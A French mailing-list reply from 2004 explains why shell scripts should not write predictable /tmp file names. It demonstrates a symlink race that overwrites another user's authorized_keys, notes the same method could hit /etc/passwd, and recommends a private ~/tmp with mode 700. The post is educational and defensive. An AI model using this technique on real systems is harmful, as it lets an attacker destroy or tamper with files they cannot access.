On Sun, Mar 14, 2004 at 11:36:33AM +0100, Pierre Maitre wrote: > Pourtant, si les permissions sont correctes, l'attaque est refus�e (voir > ci-dessous) ou ai-je mal compris ce que tu veux d�montrer ci-dessus?
Oui: > -rw-r--r-- 1 root root 29 mar 14 11:28 file_1 > [EMAIL PROTECTED]:/tmp$ echo > blabla.truc.42 'test' > bash: blabla.truc.42: Permission denied On le fait plut�t autrement (je n'aime pas trop d�crire des attaques point � point, mais dans ce cas c'est tr�s connu). Pour comprendre, bien visualiser qui �crit quoi. [EMAIL PROTECTED]:~$ echo $$ 4230 [EMAIL PROTECTED]:~$ cd /tmp [EMAIL PROTECTED]:/tmp$ ln -s ~schaefer/.ssh/authorized_keys tmp.file.4234 [EMAIL PROTECTED]:/tmp$ ln -s ~schaefer/.ssh/authorized_keys tmp.file.4235 [EMAIL PROTECTED]:/tmp$ ln -s ~schaefer/.ssh/authorized_keys tmp.file.4236 [EMAIL PROTECTED]:/tmp$ ln -s ~schaefer/.ssh/authorized_keys tmp.file.4237 [EMAIL PROTECTED]:~$ ls -la .ssh/authorized_keys -rw-r--r-- 1 schaefer schaefer 605 Feb 16 2003 .ssh/authorized_keys [EMAIL PROTECTED]:~% TMP_FILE=/tmp/tmp.file.$$ [EMAIL PROTECTED]:~% echo $$ 4236 [EMAIL PROTECTED]:~% date > $TMP_FILE [EMAIL PROTECTED]:~% ls -la .ssh/authorized_keys -rw-r--r-- 1 schaefer schaefer 29 Mar 14 12:16 .ssh/authorized_keys Et voil�, une attaque DoS sur un fichier auquel `testuser' n'a aucun acc�s. Remplacer schaefer par root et le fichier par /etc/passwd et on a une id�e des d�g�ts possibles, avec dans certains cas plus qu'un simple DoS. Il ne sert � rien de tester l'existence du fichier avant, ou de faire un rm: la fen�tre de vuln�rabilit� existe. On diminuera certes la probabilit�. Par contre, la cr�ation d'un r�pertoire s�curis� est s�re (si mkdir retourne, le r�pertoire a �t� cr�� et n'existait pas). Je recommande d'utiliser $HOME/tmp dans tous les scripts (bash: ~/tmp) plut�t que /tmp. Et de s'assurer que ~/tmp est 700. _______________________________________________ gull mailing list [EMAIL PROTECTED] http://lists.alphanet.ch/mailman/listinfo/gull
